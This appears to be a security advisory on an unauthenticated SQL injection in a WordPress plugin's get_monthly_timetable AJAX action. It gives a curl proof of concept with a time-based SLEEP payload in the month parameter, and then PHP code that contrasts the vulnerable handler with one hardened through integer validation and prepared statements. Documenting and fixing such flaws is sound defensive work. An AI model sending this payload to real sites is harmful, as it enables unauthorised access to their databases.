The plugin does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get_monthly_timetable&month=1 AND (SELECT 6881 FROM (SELECT(SLEEP(5)))iEAn)'
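A defender's view of the bug class described above, as an added example rather than the plugin's own code: a hypothetical get_monthly_timetable handler in its vulnerable shape beside a hardened one that validates month as an integer and binds it through $wpdb->prepare(). The table name, column names and the 1-12 range are assumptions.

```php
<?php
// Added illustration, not the plugin's own code. The table name, column
// names and the "month is an integer from 1 to 12" contract are assumptions.

// Vulnerable pattern: the raw request value is interpolated into the query,
// so a value such as "1 AND (SELECT ... SLEEP(5))" becomes part of the SQL
// and the server's response time leaks the result (time-based injection).
function vuln_get_monthly_timetable() {
    global $wpdb;
    $month = $_POST['month'];
    $sql   = "SELECT * FROM {$wpdb->prefix}timetable_events WHERE MONTH(starts_at) = $month";
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// Hardened handler: cast to an integer, range-check it, and bind it through
// $wpdb->prepare() so the value can never alter the query's structure.
function safe_get_monthly_timetable() {
    global $wpdb;

    $month = isset( $_POST['month'] ) ? absint( $_POST['month'] ) : 0;
    if ( $month < 1 || $month > 12 ) {
        // wp_send_json_error() terminates the request via wp_die().
        wp_send_json_error( 'invalid month', 400 );
    }

    $sql = $wpdb->prepare(
        "SELECT id, title, starts_at FROM {$wpdb->prefix}timetable_events WHERE MONTH(starts_at) = %d",
        $month
    );
    wp_send_json_success( $wpdb->get_results( $sql ) );
}

// Registered for both logged-in and anonymous callers because the advisory
// says the action is reachable unauthenticated; the validation above is what
// makes that exposure safe, not the choice of hook. The vulnerable function
// is deliberately left unhooked.
add_action( 'wp_ajax_get_monthly_timetable',        'safe_get_monthly_timetable' );
add_action( 'wp_ajax_nopriv_get_monthly_timetable', 'safe_get_monthly_timetable' );
```

A quick regression check for a fix like this is the advisory's own request shape: a non-numeric month value must now yield a 400 error immediately rather than a delayed response.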